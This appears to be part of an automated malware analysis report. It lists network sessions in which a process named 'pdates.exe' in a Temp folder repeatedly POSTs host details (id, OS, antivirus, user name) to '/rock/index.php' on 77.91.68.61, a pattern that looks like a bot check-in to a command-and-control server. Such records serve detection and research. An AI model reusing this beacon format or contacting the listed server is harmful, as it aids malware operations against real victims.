Jul 27, 2023 01:34:54.332918882 CEST	4039	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:54.382750988 CEST	4039	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.5	49760	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:12.439107895 CEST	2888	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:12.489739895 CEST	2888	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:12 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
430	192.168.2.5	50150	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:54.548800945 CEST	4040	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:54.599266052 CEST	4040	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
431	192.168.2.5	50151	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:54.751408100 CEST	4041	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:54.799952984 CEST	4041	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
432	192.168.2.5	50152	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:54.982754946 CEST	4042	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:55.031346083 CEST	4042	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
433	192.168.2.5	50153	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:55.204678059 CEST	4043	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:55.253741026 CEST	4043	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:55 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
434	192.168.2.5	50154	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:55.432231903 CEST	4044	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:55.482249022 CEST	4044	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:55 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
435	192.168.2.5	50155	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:55.688940048 CEST	4045	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:55.738440990 CEST	4045	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:55 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
436	192.168.2.5	50156	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:55.902545929 CEST	4046	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:55.953798056 CEST	4046	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:55 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
437	192.168.2.5	50157	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:56.176512957 CEST	4047	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:56.226625919 CEST	4047	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
438	192.168.2.5	50158	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:56.392754078 CEST	4048	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:56.443641901 CEST	4048	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
439	192.168.2.5	50159	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:56.629968882 CEST	4049	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:56.678792953 CEST	4049	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.5	49761	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:12.712929010 CEST	2889	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:12.762373924 CEST	2889	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:12 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
440	192.168.2.5	50160	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:56.837090969 CEST	4050	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:56.885212898 CEST	4050	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
441	192.168.2.5	50161	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:57.079936028 CEST	4050	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:57.129601002 CEST	4051	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
442	192.168.2.5	50162	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:57.344120979 CEST	4051	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:57.391685009 CEST	4052	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
443	192.168.2.5	50163	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:57.561216116 CEST	4052	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:57.609436035 CEST	4053	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
444	192.168.2.5	50164	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:57.804349899 CEST	4053	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:57.852195978 CEST	4054	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
445	192.168.2.5	50165	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:58.071989059 CEST	4054	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:58.179699898 CEST	4055	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
446	192.168.2.5	50166	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:58.380558968 CEST	4055	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:58.431196928 CEST	4055	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
447	192.168.2.5	50167	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:58.583519936 CEST	4056	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:58.633646965 CEST	4056	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
448	192.168.2.5	50168	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:58.801565886 CEST	4057	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:58.850380898 CEST	4057	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
449	192.168.2.5	50169	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:59.053643942 CEST	4058	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:59.102142096 CEST	4058	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.5	49762	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
